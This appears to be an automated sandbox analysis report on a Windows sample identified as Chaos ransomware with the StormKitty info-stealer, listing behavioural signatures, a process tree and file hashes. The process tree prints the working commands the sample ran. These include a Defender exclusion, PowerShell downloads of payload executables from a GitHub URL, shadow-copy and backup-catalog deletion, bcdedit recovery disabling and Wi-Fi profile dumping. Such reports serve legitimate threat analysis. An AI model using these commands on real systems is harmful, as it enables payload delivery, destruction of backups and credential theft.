Analysis

  • max time kernel
    103s
  • max time network
    114s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22/03/2025, 02:51

General

  • Target

    ZGZ3X_nig.exe

  • Size

    57KB

  • MD5

    16edd47bf01716b24958a0b3a3a7bcfb

  • SHA1

    8b7972f4190c2ca9d600084611e966fa0f899b98

  • SHA256

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

  • SHA512

    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1

  • SSDEEP

    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
    "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4024
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\473A.tmp\473B.tmp\473C.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
          PID:2796
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
        3⤵
        • Blocklisted process makes network request
        • Downloads MZ/PE file
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1912
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
        3⤵
        • Blocklisted process makes network request
        • Downloads MZ/PE file
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1152
      • C:\Users\Admin\AppData\Local\Temp\build.exe
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5028
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          "C:\Users\Admin\AppData\Roaming\svchost.exe"
          4⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Drops desktop.ini file(s)
          • Sets desktop wallpaper using registry
          • Modifies registry class
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3292
            • C:\Windows\system32\vssadmin.exe
              vssadmin delete shadows /all /quiet
              6⤵
              • Interacts with shadow copies
              PID:4480
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic shadowcopy delete
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:5048
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2752
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {default} bootstatuspolicy ignoreallfailures
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2608
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {default} recoveryenabled no
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:4300
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3448
            • C:\Windows\system32\wbadmin.exe
              wbadmin delete catalog -quiet
              6⤵
              • Deletes backup catalog
              PID:2664
          • C:\Windows\system32\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
            5⤵
            • Opens file in notepad (likely ransom note)
            PID:1688
      • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
        "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
        3⤵
        • Executes dropped EXE
        • Accesses Microsoft Outlook profiles
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • outlook_office_path
        • outlook_win_path
        PID:1348
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2816
          • C:\Windows\SysWOW64\chcp.com
            chcp 65001
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3192
          • C:\Windows\SysWOW64\netsh.exe
            netsh wlan show profile
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:4528
          • C:\Windows\SysWOW64\findstr.exe
            findstr All
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4400
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 2432
          4⤵
          • Program crash
          PID:4048
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1660
          • C:\Windows\SysWOW64\chcp.com
            chcp 65001
            5⤵
            • System Location Discovery: System Language Discovery
            PID:852
          • C:\Windows\SysWOW64\netsh.exe
            netsh wlan show networks mode=bssid
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:5064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
        3⤵
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1140
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1348 -ip 1348
    1⤵
    PID:1420
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2228
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4988
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:1204
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    • Checks SCSI registry key(s)
    PID:2628

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

    Filesize

    1B

    MD5

    d1457b72c3fb323a2671125aef3eab5d

    SHA1

    5bab61eb53176449e25c2c82f172b82cb13ffb9d

    SHA256

    8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

    SHA512

    ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

    Filesize

    226B

    MD5

    28d7fcc2b910da5e67ebb99451a5f598

    SHA1

    a5bf77a53eda1208f4f37d09d82da0b9915a6747

    SHA256

    2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

    SHA512

    2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    a15743cd087226baafa094c9aed07dc4

    SHA1

    2124cf2ac13da80b2e3cd37d3eab477261771423

    SHA256

    4211b5503de68413f5605cbeec4a49fb46fbec44c58df95be892f0dc308a39cf

    SHA512

    301e82e45c3e190bdbc1316cda1cd735434c5aa873a57322e807c7cf4c23e006e11a7347ebb0f8afed181d3a4d860202cbd6fc721b9970296c7a4b1a367805a7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    cd004cc33018d8896d50aea753fc075b

    SHA1

    063cf59c31ebca6e33d29d6e3062ef283c817924

    SHA256

    9e20a2341322632495af9aa46cfa78edeaa23bb1c72b948726eb9110ca6b22fb

    SHA512

    1fe32b73d8fab9aedf89de7b829f57087ec03718bd164303cf891e6d5804fc9a2bc16b485790bda90526fc8942b7edc7d0a567a8299ab879fe41376df71a445a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f5819e4332bfe20b154ef800c2da35c3

    SHA1

    6076c9167103e32cb21b7ba51c99b2dc7fa55af7

    SHA256

    f5fe04be666d575a4eacc7ddbfb1b172c303f9a841eb98a82067bd4cfea7403b

    SHA512

    9c99e560ea789549c82e8264e2c438cc6bb12a8facff5673f6c5dbde30db4417b7d951b659d88481624823d3f1b24c5238817f2344b4a1b084dfc12bb95e7b50

  • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

    Filesize

    81B

    MD5

    ea511fc534efd031f852fcf490b76104

    SHA1

    573e5fa397bc953df5422abbeb1a52bf94f7cf00

    SHA256

    e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

    SHA512

    f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

  • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

    Filesize

    743B

    MD5

    d7d098677c341ae3eeb87981da76e427

    SHA1

    6a0909ca3adb29a1fb9265395be93b3538402024

    SHA256

    0fdfa0ce28a62e115f88672b865b1a4b60960485d43fb6d17ecb027c501388be

    SHA512

    0f5c428936690b0d1ecb68a81372caccc0c58e69d2b56d51d726ca1088a283a5631baf64b508f944f5871e387da8aca59f096b2fbc14f5583f8d6f6b7c33f4be

  • C:\Users\Admin\AppData\Local\Temp\473A.tmp\473B.tmp\473C.bat

    Filesize

    2KB

    MD5

    1c935ef28fdfd394b770d945d7f04d76

    SHA1

    29e251c3c40ce4ad1b2984bf26b444aa045d9b21

    SHA256

    aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

    SHA512

    a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_th5qeduo.rpf.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\build.exe

    Filesize

    137KB

    MD5

    7605fb5c749eeea0b1b27fdaad78051c

    SHA1

    28388bf016af085bbcbacf8c516853942f6ec8d3

    SHA256

    466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

    SHA512

    1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

  • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

    Filesize

    211KB

    MD5

    b6054dbe4ed853c2e35291f045a632ba

    SHA1

    1355fbe1ea1f6bb566921f04512f78590c4b0e41

    SHA256

    b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4

    SHA512

    648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

  • C:\Users\Admin\readme.txt

    Filesize

    780B

    MD5

    60d646f40556d78166ad8111d850fc51

    SHA1

    babaaf0762000dbf4b3f7a93beb35b6d9279d94d

    SHA256

    a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

    SHA512

    3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

  • memory/1348-70-0x0000000006780000-0x0000000006812000-memory.dmp

    Filesize

    584KB

  • memory/1348-67-0x0000000004C00000-0x0000000004DC2000-memory.dmp

    Filesize

    1.8MB

  • memory/1348-69-0x0000000006570000-0x00000000065D6000-memory.dmp

    Filesize

    408KB

  • memory/1348-62-0x00000000001F0000-0x000000000022C000-memory.dmp

    Filesize

    240KB

  • memory/1348-64-0x0000000004A10000-0x0000000004A22000-memory.dmp

    Filesize

    72KB

  • memory/1348-68-0x0000000005B80000-0x00000000060AC000-memory.dmp

    Filesize

    5.2MB

  • memory/2300-18-0x000001B0C8C90000-0x000001B0C8EAC000-memory.dmp

    Filesize

    2.1MB

  • memory/2300-19-0x00007FF8AA7A0000-0x00007FF8AB261000-memory.dmp

    Filesize

    10.8MB

  • memory/2300-15-0x00007FF8AA7A0000-0x00007FF8AB261000-memory.dmp

    Filesize

    10.8MB

  • memory/2300-14-0x00007FF8AA7A0000-0x00007FF8AB261000-memory.dmp

    Filesize

    10.8MB

  • memory/2300-13-0x000001B0C8C50000-0x000001B0C8C72000-memory.dmp

    Filesize

    136KB

  • memory/2300-3-0x00007FF8AA7A3000-0x00007FF8AA7A5000-memory.dmp

    Filesize

    8KB

  • memory/4024-66-0x0000000140000000-0x0000000140028000-memory.dmp

    Filesize

    160KB

  • memory/4024-0-0x0000000140000000-0x0000000140028000-memory.dmp

    Filesize

    160KB

  • memory/5028-50-0x0000000000A00000-0x0000000000A28000-memory.dmp

    Filesize

    160KB